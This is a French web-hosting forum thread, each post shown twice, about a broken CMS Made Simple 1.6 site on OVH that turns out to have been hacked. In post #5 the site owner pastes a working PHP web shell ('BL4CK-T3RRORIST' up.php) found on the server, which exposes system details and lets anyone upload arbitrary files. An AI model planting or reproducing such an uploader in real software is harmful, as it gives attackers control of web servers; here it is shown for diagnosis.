[Résolu] Parse error: syntax error, unexpected T_OBJECT_OPERATOR

Note de ce sujet :
  • Moyenne : 0 (0 vote(s))
  • 1
  • 2
  • 3
  • 4
  • 5
#1
Citation :#~~~~~ DEBUT BLOC A NE PAS SUPPRIMER ~~~~~
#~ Version du CMS: ?
#~ Url du site : www.unssf.org
#~ Hébergeur / Soft : OVH 90 plan
#~ Informations Système :
#~~~~~ FIN BLOC A NE PAS SUPPRIMER ~~~~~



Bonjour,

Désolé pour le manque d'infos mais mon site est en rade et je ne sais pas comment récupérer la version. J'ai cette erreur :
Parse error: syntax error, unexpected T_OBJECT_OPERATOR in /home/unssf/www/include.php on line 85

Ça à l'air d'être un problème de version php. J'ai essayé de modifier la version php dans le .htaccess et aussi de créer un .ovhconfig mais ça me renvoie une erreur 501 Method Not Implemented.

Je pense que le problème vient du fait que mon site n'est pas à jour mais tant que ça marche, j'ai préféré ne rien modifier. Mais maintenant j'hésite à mettre à jour vu qu'il ne fonctionne pas. Je tourne en rond quoi...

Antoine
CMSMS 1.6
90plan OVH
#1
Citation :#~~~~~ DEBUT BLOC A NE PAS SUPPRIMER ~~~~~
#~ Version du CMS: ?
#~ Url du site : www.unssf.org
#~ Hébergeur / Soft : OVH 90 plan
#~ Informations Système :
#~~~~~ FIN BLOC A NE PAS SUPPRIMER ~~~~~



Bonjour,

Désolé pour le manque d'infos mais mon site est en rade et je ne sais pas comment récupérer la version. J'ai cette erreur :
Parse error: syntax error, unexpected T_OBJECT_OPERATOR in /home/unssf/www/include.php on line 85

Ça à l'air d'être un problème de version php. J'ai essayé de modifier la version php dans le .htaccess et aussi de créer un .ovhconfig mais ça me renvoie une erreur 501 Method Not Implemented.

Je pense que le problème vient du fait que mon site n'est pas à jour mais tant que ça marche, j'ai préféré ne rien modifier. Mais maintenant j'hésite à mettre à jour vu qu'il ne fonctionne pas. Je tourne en rond quoi...

Antoine
CMSMS 1.6
90plan OVH
#2
Le site fonctionne sur une installation locale?
Tu effaces tout, tu réinstalles avec la dernière sauvegarde qui fonctionnait et tu fais la mise à jour.
EDIT : si c'est la version qui est dans ta signature tu as pas mal de retard Sad Sad
MS-Dos, Gem, geoworks, Windows 1, 2, 3, 3.1, 95, 98, XP, seven, 8, 10 Smile
Mac system 1 à 6
Wampserver 3.1.9,
PhP 7.3.5,
CMS version 2.2.11
#2
Le site fonctionne sur une installation locale?
Tu effaces tout, tu réinstalles avec la dernière sauvegarde qui fonctionnait et tu fais la mise à jour.
EDIT : si c'est la version qui est dans ta signature tu as pas mal de retard Sad Sad
MS-Dos, Gem, geoworks, Windows 1, 2, 3, 3.1, 95, 98, XP, seven, 8, 10 Smile
Mac system 1 à 6
Wampserver 3.1.9,
PhP 7.3.5,
CMS version 2.2.11
#3
Citation :Ça à l'air d'être un problème de version php. J'ai essayé de modifier la version php dans le .htaccess
http://forum.ovh.com/showthread.php?9954...post612440
et http://www.ovh.com/fr/g1207.configurer-p...mplemented
#3
Citation :Ça à l'air d'être un problème de version php. J'ai essayé de modifier la version php dans le .htaccess
http://forum.ovh.com/showthread.php?9954...post612440
et http://www.ovh.com/fr/g1207.configurer-p...mplemented
#4
Si c'est une version 1.6.x, il faut php 5.2 maxi
J-C Etiemble v 2.2.xx
#4
Si c'est une version 1.6.x, il faut php 5.2 maxi
J-C Etiemble v 2.2.xx
#5
J'ai remis une version de .htaccess sauvegardée en 2012 et ça refonctionne Big Grin
En revanche j'ai trouvé un fichier up.php à la base de mon site :
Code :
[== PHP ==]
<?php

echo '<b>BL4CK-T3RRORIST</b>';

echo '<b><br><br>'.php_uname().'<br></b>';

echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';

echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';

if( $_POST['_upl'] == "Upload" ) {

if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>uploaded! :D</b><br><br>'; }

else { echo '<b>upload FaileD :(</b><br><br>'; }

}

?>
CMSMS 1.6
90plan OVH
#5
J'ai remis une version de .htaccess sauvegardée en 2012 et ça refonctionne Big Grin
En revanche j'ai trouvé un fichier up.php à la base de mon site :
Code :
[== PHP ==]
<?php

echo '<b>BL4CK-T3RRORIST</b>';

echo '<b><br><br>'.php_uname().'<br></b>';

echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';

echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';

if( $_POST['_upl'] == "Upload" ) {

if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>uploaded! :D</b><br><br>'; }

else { echo '<b>upload FaileD :(</b><br><br>'; }

}

?>
CMSMS 1.6
90plan OVH
#6
et je n'ai plus à l'espace admin : Utilisateur non trouvé :mad:

EDIT : C'est rétabli
CMSMS 1.6
90plan OVH
#6
et je n'ai plus à l'espace admin : Utilisateur non trouvé :mad:

EDIT : C'est rétabli
CMSMS 1.6
90plan OVH
#7
Tu as été hacké comme beaucoup d'autres, fais une recherche sur bl4ck-t3rrorist.
Ça va être chaud pour les webmasters français : d'un côté ils vont se faire fermer par la police, de l'autre ils vont se faire hacker par des pirates d'une autre école de pensée. Vous avez intérêt à mettre vos sites à jour et surtout sécuriser l'accès à votre serveur Wink.
#7
Tu as été hacké comme beaucoup d'autres, fais une recherche sur bl4ck-t3rrorist.
Ça va être chaud pour les webmasters français : d'un côté ils vont se faire fermer par la police, de l'autre ils vont se faire hacker par des pirates d'une autre école de pensée. Vous avez intérêt à mettre vos sites à jour et surtout sécuriser l'accès à votre serveur Wink.
#8
>Ça va être chaud pour les webmasters français ... Vous avez intérêt à mettre vos sites à jour
Ben oui une activité normale la mise à jour et la sécurisation Rolleyes sauf pour certains
J-C Etiemble v 2.2.xx
#8
>Ça va être chaud pour les webmasters français ... Vous avez intérêt à mettre vos sites à jour
Ben oui une activité normale la mise à jour et la sécurisation Rolleyes sauf pour certains
J-C Etiemble v 2.2.xx


Atteindre :


Utilisateur(s) parcourant ce sujet : 1 visiteur(s)